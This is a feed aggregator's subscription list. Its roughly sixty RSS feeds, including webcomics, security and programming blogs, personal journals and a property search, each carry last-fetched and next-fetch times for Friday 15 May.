https://www.rightmove.co.uk/rss/property-for-sale/find.html?locationIdentifier=REGION^876&maxPrice=240000&minBedrooms=2&displayPropertyType=houses&oldDisplayPropertyType=houses&primaryDisplayPropertyType=houses&oldPrimaryDisplayPropertyType=houses&numberOfPropertiesPerPage=24 XML 22:07, Friday, 15 May 22:50, Friday, 15 May
https://x.com/statuses/user_timeline/22724360.rss XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Humble Bundle Blog XML 21:28, Friday, 15 May 22:15, Friday, 15 May
I, Cringely XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Irregular Webcomic! XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Joel on Software XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Judith Proctor's Journal XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Krebs on Security XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Lambda the Ultimate - Programming Languages Weblog XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Looking For Group XML 21:49, Friday, 15 May 22:33, Friday, 15 May
LWN.net XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Mimi and Eunice XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Neil Gaiman's Journal XML 21:56, Friday, 15 May 22:36, Friday, 15 May
Nina Paley XML 21:28, Friday, 15 May 22:15, Friday, 15 May
O Abnormal – Scifi/Fantasy Artist XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Oglaf! -- Comics. Often dirty. XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Oh Joy Sex Toy XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Order of the Stick XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Original Fiction Archives - Reactor XML 21:35, Friday, 15 May 22:17, Friday, 15 May
OSnews XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Paul Graham: Unofficial RSS Feed XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Penny Arcade XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Penny Red XML 21:49, Friday, 15 May 22:34, Friday, 15 May
PHD Comics XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Phil's blog XML 21:35, Friday, 15 May 22:23, Friday, 15 May
Planet Debian XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Planet GNU XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Planet Lisp XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Pluralistic: Daily links from Cory Doctorow XML 21:56, Friday, 15 May 22:36, Friday, 15 May
PS238 by Aaron Williams XML 21:35, Friday, 15 May 22:23, Friday, 15 May
QC RSS XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Radar XML 21:35, Friday, 15 May 22:17, Friday, 15 May
RevK®'s ramblings XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Richard Stallman's Political Notes XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Scenes From A Multiverse XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Schneier on Security XML 21:56, Friday, 15 May 22:36, Friday, 15 May
SCHNEWS.ORG.UK XML 21:49, Friday, 15 May 22:33, Friday, 15 May
Scripting News XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Seth's Blog XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Skin Horse XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Tales From the Riverbank XML 21:56, Friday, 15 May 22:45, Friday, 15 May
The Adventures of Dr. McNinja XML 21:49, Friday, 15 May 22:34, Friday, 15 May
The Bumpycat sat on the mat XML 21:56, Friday, 15 May 22:36, Friday, 15 May
The Daily WTF XML 22:14, Friday, 15 May 23:00, Friday, 15 May
The Monochrome Mob XML 22:07, Friday, 15 May 22:48, Friday, 15 May
The Non-Adventures of Wonderella XML 22:07, Friday, 15 May 22:50, Friday, 15 May
The Old New Thing XML 21:49, Friday, 15 May 22:33, Friday, 15 May
The Open Source Grid Engine Blog XML 21:28, Friday, 15 May 22:15, Friday, 15 May
The Stranger XML 21:49, Friday, 15 May 22:34, Friday, 15 May
towerhamletsalarm XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Twokinds XML 21:35, Friday, 15 May 22:17, Friday, 15 May
UK Indymedia Features XML 21:35, Friday, 15 May 22:17, Friday, 15 May
Uploads from ne11y XML 22:14, Friday, 15 May 23:00, Friday, 15 May
Uploads from piasladic XML 22:07, Friday, 15 May 22:50, Friday, 15 May
Use Sword on Monster XML 21:28, Friday, 15 May 22:15, Friday, 15 May
Wayward Sons: Legends - Sci-Fi Full Page Webcomic - Updates Daily XML 22:14, Friday, 15 May 23:00, Friday, 15 May
what if? XML 22:07, Friday, 15 May 22:48, Friday, 15 May
Whatever XML 21:56, Friday, 15 May 22:45, Friday, 15 May
Whitechapel Anarchist Group XML 21:56, Friday, 15 May 22:45, Friday, 15 May
WIL WHEATON dot NET XML 21:49, Friday, 15 May 22:33, Friday, 15 May
wish XML 21:49, Friday, 15 May 22:34, Friday, 15 May
Writing the Bright Fantastic XML 21:49, Friday, 15 May 22:33, Friday, 15 May
xkcd.com XML 22:07, Friday, 15 May 22:50, Friday, 15 May